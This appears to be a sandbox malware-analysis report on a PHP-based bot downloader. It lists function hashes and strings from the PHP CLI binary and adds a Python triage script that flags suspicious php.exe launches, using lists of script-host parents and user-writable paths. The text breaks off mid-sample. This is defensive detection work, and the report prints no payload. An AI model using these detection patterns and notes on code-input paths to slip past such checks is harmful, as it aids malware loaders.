                                                • Opcode Fuzzy Hash: fb42830bdd064bb1acbce0b55d4d7959c793a1a6dabc3b39c22b22369a1dcea0
                                                • Instruction Fuzzy Hash: 14910F22A1DA9685E620EB25E8513AEB3B0FBC5780F544532E68FD3E99DF3CD444CB44
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2019170510.00007FF658E21000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF658E20000, based on PE: true
                                                • Associated: 0000000C.00000002.2019138076.00007FF658E20000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019211886.00007FF658E4B000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019499545.00007FF658E5F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E62000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E66000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7ff658e20000_php_bot_downloader_v2-AVERAGE-BOI-CLN.jbxd
                                                Similarity
                                                • API ID: Is_bad_exception_allowedstd::bad_alloc::bad_alloc
                                                • String ID: csm$csm$csm
                                                • API String ID: 3523768491-393685449
                                                • Opcode ID: 2ddeceb2b1e2050200a8eb5915ffc846504ca094d5999cbdc1050429b9866f80
                                                • Instruction ID: 79f29145faf9c0da41d1c089eabec47b22ed622c67d535f97a9ee6d60c9b3aba
                                                • Opcode Fuzzy Hash: 2ddeceb2b1e2050200a8eb5915ffc846504ca094d5999cbdc1050429b9866f80
                                                • Instruction Fuzzy Hash: B9E19673A086A28AEB619F35D8413AD37B0FB45748F184135EA4DA7AA5CF3CF985C704
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2019170510.00007FF658E21000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF658E20000, based on PE: true
                                                • Associated: 0000000C.00000002.2019138076.00007FF658E20000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019211886.00007FF658E4B000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019499545.00007FF658E5F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E62000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E66000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7ff658e20000_php_bot_downloader_v2-AVERAGE-BOI-CLN.jbxd
                                                Similarity
                                                • API ID: Lockitstd::_$Lockit::_Lockit::~_$Concurrency::cancel_current_taskGetfacet__int64std::locale::_
                                                • String ID:
                                                • API String ID: 2644824941-0
                                                • Opcode ID: 4e8ff2d6e0e881a76c7e224c95ace2b212c0d57f2ab622ddbebd630806d503df
                                                • Instruction ID: 39da743d28c4e63c8cb6c93db0f95f6623fc2d16b252a1b3cd51fb1a49f4ab67
                                                • Opcode Fuzzy Hash: 4e8ff2d6e0e881a76c7e224c95ace2b212c0d57f2ab622ddbebd630806d503df
                                                • Instruction Fuzzy Hash: C8211C2291DA5681DA50DB25F88126AB3B0FBC47A4F581232F69F93FB9CE3CD540CB44
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2019170510.00007FF658E21000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF658E20000, based on PE: true
                                                • Associated: 0000000C.00000002.2019138076.00007FF658E20000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019211886.00007FF658E4B000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019499545.00007FF658E5F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E62000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E66000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7ff658e20000_php_bot_downloader_v2-AVERAGE-BOI-CLN.jbxd
                                                Similarity
                                                • API ID: Lockitstd::_$Lockit::_Lockit::~_$Concurrency::cancel_current_taskGetfacet__int64std::locale::_
                                                • String ID:
                                                • API String ID: 2644824941-0
                                                • Opcode ID: 554728f3cb3212a051f0630be7b155290780745ec98476e122ebd23f86fb3f2a
                                                • Instruction ID: e894e3c5995f72e8fb1406ffa568db5827a7284b01301f34989df97097850ae2
                                                • Opcode Fuzzy Hash: 554728f3cb3212a051f0630be7b155290780745ec98476e122ebd23f86fb3f2a
                                                • Instruction Fuzzy Hash: AA21012691DA5681DA50DB25F88126AB7B0FBC47A4F581131F68F93FB9DE3CD540CB04
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2019170510.00007FF658E21000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF658E20000, based on PE: true
                                                • Associated: 0000000C.00000002.2019138076.00007FF658E20000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019211886.00007FF658E4B000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019499545.00007FF658E5F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E62000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E66000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7ff658e20000_php_bot_downloader_v2-AVERAGE-BOI-CLN.jbxd
                                                Similarity
                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                • String ID: CorExitProcess$mscoree.dll
                                                • API String ID: 4061214504-1276376045
                                                • Opcode ID: 9cc20eae06868b564852225bda0ce1a891cf480019757d5227e3f406cf984c5b
                                                • Instruction ID: 8c10f0400e314bb426b9493bf0863862c56098dcb7d35b55e2500cc4170d295b
                                                • Opcode Fuzzy Hash: 9cc20eae06868b564852225bda0ce1a891cf480019757d5227e3f406cf984c5b
                                                • Instruction Fuzzy Hash: EBF05EA5B29B6691FF444B70E4953782370AFC4B50F081035D98FE6AB5CE3CE988C308
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2019170510.00007FF658E21000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF658E20000, based on PE: true
                                                • Associated: 0000000C.00000002.2019138076.00007FF658E20000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019211886.00007FF658E4B000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019499545.00007FF658E5F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E62000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E66000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7ff658e20000_php_bot_downloader_v2-AVERAGE-BOI-CLN.jbxd
                                                Similarity
                                                • API ID: AdjustPointer
                                                • String ID:
                                                • API String ID: 1740715915-0
                                                • Opcode ID: 1f862b495ce0092b4b467d6445097635467c5ad24390af48dd2882038da0547f
                                                • Instruction ID: 3f8a3b8accd8729b983d14ed05a0a0d260dd73710afcc9898ba5219dedc7f2ef
                                                • Opcode Fuzzy Hash: 1f862b495ce0092b4b467d6445097635467c5ad24390af48dd2882038da0547f
                                                • Instruction Fuzzy Hash: D6B18331A0A66685EE669A35954063963B0AF44B84F0D8435DE4DB7FA6DE7CFC81C308
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2019170510.00007FF658E21000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF658E20000, based on PE: true
                                                • Associated: 0000000C.00000002.2019138076.00007FF658E20000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019211886.00007FF658E4B000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019499545.00007FF658E5F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E62000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E66000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7ff658e20000_php_bot_downloader_v2-AVERAGE-BOI-CLN.jbxd
                                                Similarity
                                                • API ID: char_traits
                                                • String ID:
                                                • API String ID: 1158913984-0
                                                • Opcode ID: eee9b33b103d1c671d78ca435e39c14e0fe5bb946dc4f95c2f57295a9fdf7c4a
                                                • Instruction ID: 5f8cc2c2a7cedb49b97d14057f648126745fe887194eb28bfe1b6cbe3aab18e6
                                                • Opcode Fuzzy Hash: eee9b33b103d1c671d78ca435e39c14e0fe5bb946dc4f95c2f57295a9fdf7c4a
                                                • Instruction Fuzzy Hash: BB411D22A0C55385DA10AB61E85127AA371FBC0754F480031F68FE6EA6DFBCD445CB44
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2019170510.00007FF658E21000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF658E20000, based on PE: true
                                                • Associated: 0000000C.00000002.2019138076.00007FF658E20000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019211886.00007FF658E4B000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019499545.00007FF658E5F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E62000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E66000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7ff658e20000_php_bot_downloader_v2-AVERAGE-BOI-CLN.jbxd
                                                Similarity
                                                • API ID: ByteCharConcurrency::details::EmptyMultiQueue::StructuredWideWork$Func_class
                                                • String ID:
                                                • API String ID: 2499392862-0
                                                • Opcode ID: 6924f140a0b5c5d1967e81772abc8e7d71d3b60c7ca967b30c720e5a1017f485
                                                • Instruction ID: ed5d3ba0a6e21e09a317610c4a74535e9e625692c002ea93f846122bb9731482
                                                • Opcode Fuzzy Hash: 6924f140a0b5c5d1967e81772abc8e7d71d3b60c7ca967b30c720e5a1017f485
                                                • Instruction Fuzzy Hash: 1731F932619A9686E760EB21F85136AB7B1FBC5780F445035EACE97E69DF3CD4048B04
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2019170510.00007FF658E21000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF658E20000, based on PE: true
                                                • Associated: 0000000C.00000002.2019138076.00007FF658E20000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019211886.00007FF658E4B000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019499545.00007FF658E5F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E62000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E66000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7ff658e20000_php_bot_downloader_v2-AVERAGE-BOI-CLN.jbxd
                                                Similarity
                                                • API ID: _set_statfp
                                                • String ID:
                                                • API String ID: 1156100317-0
                                                • Opcode ID: 5ec7d1d2ee78b7bb47a819edda9959dead6f4184f451086c1de1fab1feefcc3a
                                                • Instruction ID: b79edae6caa975e051b871b746ed06a396ae7c036f669ad1d9df3175f1c429f5
                                                • Opcode Fuzzy Hash: 5ec7d1d2ee78b7bb47a819edda9959dead6f4184f451086c1de1fab1feefcc3a
                                                • Instruction Fuzzy Hash: 2C119422E18A2B01F7541538DC413B510616FD4374F1D0638EAEEF6FFA8E7CE9415189
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2019170510.00007FF658E21000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF658E20000, based on PE: true
                                                • Associated: 0000000C.00000002.2019138076.00007FF658E20000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019211886.00007FF658E4B000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019499545.00007FF658E5F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E62000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E66000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7ff658e20000_php_bot_downloader_v2-AVERAGE-BOI-CLN.jbxd
                                                Similarity
                                                • API ID: _invalid_parameter_noinfo
                                                • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                • API String ID: 3215553584-1196891531
                                                • Opcode ID: 235069ecbf4a5eaf0fbea59f941ac267a5bf642a7a0aa0abdf81a8f9634a849a
                                                • Instruction ID: c51d81f12461daf5231190d7b0a133446771882845a4b1df602075a0f8ab708e
                                                • Opcode Fuzzy Hash: 235069ecbf4a5eaf0fbea59f941ac267a5bf642a7a0aa0abdf81a8f9634a849a
                                                • Instruction Fuzzy Hash: 1E81A232E0C26289F7E74A3982542392BB09B9174CF6D5035CACDF6DB5CE3DA9059A0D
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2019170510.00007FF658E21000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF658E20000, based on PE: true
                                                • Associated: 0000000C.00000002.2019138076.00007FF658E20000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019211886.00007FF658E4B000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019499545.00007FF658E5F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E62000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E66000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7ff658e20000_php_bot_downloader_v2-AVERAGE-BOI-CLN.jbxd
                                                Similarity
                                                • API ID: CallEncodePointerTranslator
                                                • String ID: MOC$RCC
                                                • API String ID: 3544855599-2084237596
                                                • Opcode ID: 6334b790ba180b6d72bd3d4becf287214f241295dda6d2a72eef6ce3b9437840
                                                • Instruction ID: a219cbf3e5308b122b4012d85ab35b384283f2d81100786a1009b6a406386e45
                                                • Opcode Fuzzy Hash: 6334b790ba180b6d72bd3d4becf287214f241295dda6d2a72eef6ce3b9437840
                                                • Instruction Fuzzy Hash: B891B173A087A28AE751DB74D8402AC77B0FB44788F184129EE8DA7B65DF3CE995C704
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2019170510.00007FF658E21000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF658E20000, based on PE: true
                                                • Associated: 0000000C.00000002.2019138076.00007FF658E20000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019211886.00007FF658E4B000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019499545.00007FF658E5F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E62000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E66000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7ff658e20000_php_bot_downloader_v2-AVERAGE-BOI-CLN.jbxd
                                                Similarity
                                                • API ID: CallEncodePointerTranslator
                                                • String ID: MOC$RCC
                                                • API String ID: 3544855599-2084237596
                                                • Opcode ID: f4444d037b1fb689084b3d10cb9da7450b886d7a58eb8ba5ff558f001752dc68
                                                • Instruction ID: b2edae5a1f290782e8044e4ac658e96312c68c5f15e0a5856f7ed08192d1f618
                                                • Opcode Fuzzy Hash: f4444d037b1fb689084b3d10cb9da7450b886d7a58eb8ba5ff558f001752dc68
                                                • Instruction Fuzzy Hash: D6514C32A08B558AE7209F65D8403AD77B0F744B88F184129EF4DA3F69DF78E955C704
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2019170510.00007FF658E21000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF658E20000, based on PE: true
                                                • Associated: 0000000C.00000002.2019138076.00007FF658E20000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019211886.00007FF658E4B000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019499545.00007FF658E5F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E62000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E66000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7ff658e20000_php_bot_downloader_v2-AVERAGE-BOI-CLN.jbxd
                                                Similarity
                                                • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                • String ID: csm$csm
                                                • API String ID: 3896166516-3733052814
                                                • Opcode ID: 1231e3bd0bbc00f4bab183a5bb9aa44d8e00dd2da21d4a5fc5b7d713ce3abe7b
                                                • Instruction ID: 7c34db624e4730e1e24fb2d4eed95ad9807ff336059f132ef51825347398c65a
                                                • Opcode Fuzzy Hash: 1231e3bd0bbc00f4bab183a5bb9aa44d8e00dd2da21d4a5fc5b7d713ce3abe7b
                                                • Instruction Fuzzy Hash: 48517032908652C6EB249B31984437876B4FB54B85F1C9139EA8DA7FA5CF3CFC508709
                                                APIs
                                                Memory Dump Source

Execution Graph

Execution Coverage: 1.6%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 3.8%
Total number of Nodes: 681
Total number of Limit Nodes: 76

                                                Control-flow Graph

                                                Function 7ff7498c1b10-7ff7498c2f53, the PHP CLI's do_cli routine (sapi/cli/php_cli.c). The graph itself was exported as raw node and edge data and is not reproducible as text; the blocks it covers are the php_getopt loop, the -i/-m/-v branches (php_print_info, php_output_end_all, get_zend_version), the module listing built with _zend_hash_init, zend_hash_copy, zend_hash_sort_ex and the zend_llist calls, php_request_startup, the script-file path through virtual_cwd_activate, virtual_fopen, zend_stream_init_fp and virtual_realpath (php_printf of "Could not open input file: %s" on failure), zend_register_bool_constant and zend_is_auto_global, and the shutdown path through php_request_shutdown, zend_destroy_file_handle, sapi_deactivate, zend_ini_deactivate, free and _getpid.
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2894832736.00007FF7498C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7498C0000, based on PE: true
                                                • Associated: 00000018.00000002.2894785645.00007FF7498C0000.00000002.00000001.01000000.0000000F.sdmp
                                                • Associated: 00000018.00000002.2894913708.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmp
                                                • Associated: 00000018.00000002.2895019683.00007FF7498E1000.00000004.00000001.01000000.0000000F.sdmp
                                                • Associated: 00000018.00000002.2895069671.00007FF7498E4000.00000002.00000001.01000000.0000000F.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ff7498c0000_php.jbxd
                                                Similarity
                                                • API ID: php_printf$__acrt_iob_funcphp_getoptphp_request_startup$_getpidphp_output_end_allsapi_deactivatezend_stream_init_fp$_strdup_zend_hash_init@@32fflushfprintffreeget_zend_versionphp_output_writephp_print_infophp_request_shutdownvirtual_cwd_activatevirtual_fopenvirtual_realpathzend_destroy_file_handlezend_hash_copy@@24zend_hash_destroy@@8zend_hash_sort_ex@@32zend_ini_deactivatezend_is_auto_globalzend_llist_applyzend_llist_copyzend_llist_destroyzend_llist_sortzend_register_bool_constant
                                                • String ID: [Zend Modules]$%s$15:25:31$8.2.11$Could not open input file: %s$Could not startup.$Executing for the first time...$Finished execution, repeating...$Interactive shell$PHP %s (%s) (built: %s %s) (%s)Copyright (c) The PHP Group%s$PHP_CLI_PROCESS_TITLE$Sep 26 2023$Standard input code$ZTS Visual C++ 2019 x64$[PHP Modules]
                                                • API String ID: 3507818244-273433681
                                                • Opcode ID: 2dd6b8cd20865020332e33e677d92a6217c471f526988be5374fc274d9a3640b
                                                • Instruction ID: 8578b91d9d29d8727435965ef985c708a7ece50096dc5d665f7acf6c257453a2
                                                • Opcode Fuzzy Hash: 2dd6b8cd20865020332e33e677d92a6217c471f526988be5374fc274d9a3640b
                                                • Instruction Fuzzy Hash: A152E332A08B46C5EB10BF69E8947A9B7B8FB48798F904136DA4E437A4DF3CE454C750

                                                Control-flow Graph

                                                Function 7ff7498c3050-7ff7498c35e2, the CLI entry point (main in sapi/cli/php_cli.c). Graph data not reproducible as text; the blocks cover php_win32_console_fileno_set_vt100, php_tsrm_startup and tsrm_get_ls_cache, _setmode on the three standard handles, the php_getopt pre-scan with php_ini_builder_define and php_ini_builder_prepend (the hardcoded CLI INI string listed under Strings), sapi_startup, php_win32_cp_cli_do_setup, GetCommandLineW and CommandLineToArgvW with php_win32_cp_conv_w_to_cur, SetConsoleCtrlHandler, the __intrinsic_setjmp bailout frame around the call to 7ff7498c1b10, then php_module_shutdown, sapi_shutdown, tsrm_shutdown, php_win32_cp_cli_do_restore, free, LocalFree and exit.
                                                Strings
                                                • html_errors=0register_argc_argv=1implicit_flush=1output_buffering=0max_execution_time=0max_input_time=-1, xrefs: 00007FF7498C3314
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2894832736.00007FF7498C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7498C0000, based on PE: true
                                                • Associated: 00000018.00000002.2894785645.00007FF7498C0000.00000002.00000001.01000000.0000000F.sdmp
                                                • Associated: 00000018.00000002.2894913708.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmp
                                                • Associated: 00000018.00000002.2895019683.00007FF7498E1000.00000004.00000001.01000000.0000000F.sdmp
                                                • Associated: 00000018.00000002.2895069671.00007FF7498E4000.00000002.00000001.01000000.0000000F.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ff7498c0000_php.jbxd
                                                Similarity
                                                • API ID: __acrt_iob_func_fileno_setmodefree$php_win32_console_fileno_set_vt100$FreeLocal__p__fmodeexitphp_getoptphp_ini_builder_prependphp_module_shutdownphp_tsrm_startupphp_win32_cp_cli_do_restoresapi_shutdownsapi_startuptsrm_get_ls_cachetsrm_shutdown
                                                • String ID: html_errors=0register_argc_argv=1implicit_flush=1output_buffering=0max_execution_time=0max_input_time=-1
                                                • API String ID: 305676487-87643557
                                                • Opcode ID: f4cebb72dd500258a0e330d1e8e58d1e2ced59ca17baeb36faa32f8930b498ab
                                                • Instruction ID: 5a0dbdeca6a05e4626ee4e6e840612214593162d544f7b5ebe6b4844671c7c19
                                                • Opcode Fuzzy Hash: f4cebb72dd500258a0e330d1e8e58d1e2ced59ca17baeb36faa32f8930b498ab
                                                • Instruction Fuzzy Hash: 0BE10A32A0DB42CAEB11BF29E854269B7B8FB88B94F944135DA4E43764DF3CE465C710

                                                Control-flow Graph

                                                Function 7ff7498c28d1-7ff7498c2b34, the -R/-F per-input-line loop of do_cli with its -B/-E begin and end code. Graph data not reproducible as text; the blocks read input with _php_stream_get_line, store argn and argi via _emalloc, memmove and zend_hash_str_update, run the begin, per-line and end code through zend_eval_string_ex ("Command line begin code", "Command line run code", "Command line end code"), or for -F open the file with virtual_fopen and zend_stream_init_fp and run it with php_execute_script, releasing buffers with _efree; the tail shares do_cli's shutdown blocks (php_request_shutdown, zend_destroy_file_handle, sapi_deactivate, zend_ini_deactivate) and the "Finished execution, repeating..." path.
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2894832736.00007FF7498C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7498C0000, based on PE: true
                                                • Associated: 00000018.00000002.2894785645.00007FF7498C0000.00000002.00000001.01000000.0000000F.sdmp
                                                • Associated: 00000018.00000002.2894913708.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmp
                                                • Associated: 00000018.00000002.2895019683.00007FF7498E1000.00000004.00000001.01000000.0000000F.sdmp
                                                • Associated: 00000018.00000002.2895069671.00007FF7498E4000.00000002.00000001.01000000.0000000F.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ff7498c0000_php.jbxd
                                                Similarity
                                                • API ID: zend_eval_string_ex$__acrt_iob_func_efree@@8php_printfvirtual_fopenzend_hash_str_update@@32$_emalloc@@8_getpid_php_stream_get_linefflushfprintffreememmovephp_execute_scriptphp_request_shutdownsapi_deactivatevirtual_cwd_activatezend_destroy_file_handlezend_ini_deactivatezend_stream_init_fp
                                                • String ID: Command line begin code$Command line end code$Command line run code$Could not open input file: %s$Finished execution, repeating...$argi$argn
                                                • API String ID: 1245382911-2716470631
                                                • Opcode ID: a3b7ee3bf8614664bf83c142438161779f3922f9901a73c0d7b3d89e86b64090
                                                • Instruction ID: 38f4b08db1694bf692416bde49256cb8768fffafa7819d3042ac043eab1dff7c
                                                • Opcode Fuzzy Hash: a3b7ee3bf8614664bf83c142438161779f3922f9901a73c0d7b3d89e86b64090
                                                • Instruction Fuzzy Hash: E7C12726A0DB42C6EB14FF29E4442B9A7B8FB48B94F944135DA4E437A4DF3CE465D320
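The two listings above (7ff7498c1b10 and 7ff7498c28d1) show how the stock PHP CLI decides where its code comes from: -r, -R and -F carry code or a file name on the command line, -f or the first positional operand names a script, and with none of those the interpreter falls through to "Standard input code". A loader that drops an unmodified php.exe has to use one of those paths, so each is a hunting hook. The following is an added triage example, not output of the sandbox report and not code from the PHP project: it parses php.exe command lines along those option branches and scores Sysmon-style process-creation events. The option table follows php_cli.c; the script-host list, the user-writable path pattern, the field names and every sample event are constructed for the example.

```python
"""Triage of php.exe process-creation events (added example, not report output)."""
import re

ARG_OPTS = set("rRFBEfdcz")          # CLI switches that consume the next argument
INFO_OPTS = set("vimh")              # -v/-i/-m/-h print and exit; no code runs
SCRIPT_HOSTS = {"mshta.exe", "powershell.exe", "pwsh.exe",
                "wscript.exe", "cscript.exe", "wmic.exe"}     # assumed parent list
USER_WRITABLE = re.compile(                                    # assumed drop locations
    r"^[a-z]:\\(users\\[^\\]+\\(appdata|downloads|desktop|documents)"
    r"|programdata|windows\\temp)\\", re.I)
TOKEN = re.compile(r'"[^"]*"|\S+')


def split_cmdline(cmdline):
    """Windows-style split: a double-quoted run is one argument, quotes dropped."""
    return [t[1:-1] if len(t) >= 2 and t[0] == t[-1] == '"' else t
            for t in TOKEN.findall(cmdline)]


def parse_php_cli(cmdline):
    """Return (mode, operand): run-code (-r), code-per-line (-R), file-per-line (-F),
    script-file (-f or first positional), info (-v/-i/-m/-h), interactive (-a),
    or stdin when no code source is given at all."""
    argv = split_cmdline(cmdline)
    mode, operand = "stdin", None
    i = 1
    while i < len(argv):
        arg = argv[i]
        if arg == "--":                      # what follows is the script and its args
            if mode == "stdin" and i + 1 < len(argv):
                mode, operand = "script-file", argv[i + 1]
            break
        if arg.startswith("-") and len(arg) > 1:
            flag = arg[1]
            if flag in ARG_OPTS:
                if len(arg) > 2:             # "-rcode" form
                    value = arg[2:]
                else:                        # "-r code" form
                    i += 1
                    value = argv[i] if i < len(argv) else ""
                if flag == "r":
                    mode, operand = "run-code", value
                elif flag == "R":
                    mode, operand = "code-per-line", value
                elif flag == "F":
                    mode, operand = "file-per-line", value
                elif flag == "f":
                    mode, operand = "script-file", value
            elif flag in INFO_OPTS:
                mode, operand = "info", flag
            elif flag == "a":
                mode, operand = "interactive", None
            i += 1
            continue
        if mode == "stdin":                  # first positional operand is the script
            mode, operand = "script-file", arg
        break
    return mode, operand


def triage(event):
    """Return the reasons a php.exe launch deserves a look (empty list = quiet)."""
    image = event["Image"]
    if not image.lower().endswith("\\php.exe"):
        return []
    reasons = []
    parent = event["ParentImage"].rsplit("\\", 1)[-1].lower()
    if parent in SCRIPT_HOSTS:
        reasons.append("spawned by script host " + parent)
    if USER_WRITABLE.match(image):
        reasons.append("interpreter runs from a user-writable directory")
    mode, operand = parse_php_cli(event["CommandLine"])
    if mode in ("run-code", "code-per-line"):
        reasons.append("inline PHP on the command line (" + mode + ")")
    elif mode == "stdin":
        reasons.append("no script operand, code will be read from stdin")
    elif mode in ("script-file", "file-per-line") and operand and USER_WRITABLE.match(operand):
        reasons.append("script file in a user-writable directory")
    return reasons


SAMPLE_EVENTS = [   # constructed, Sysmon event 1 style field names
    {"Image": r"C:\Users\victim\AppData\Local\Temp\php\php.exe",
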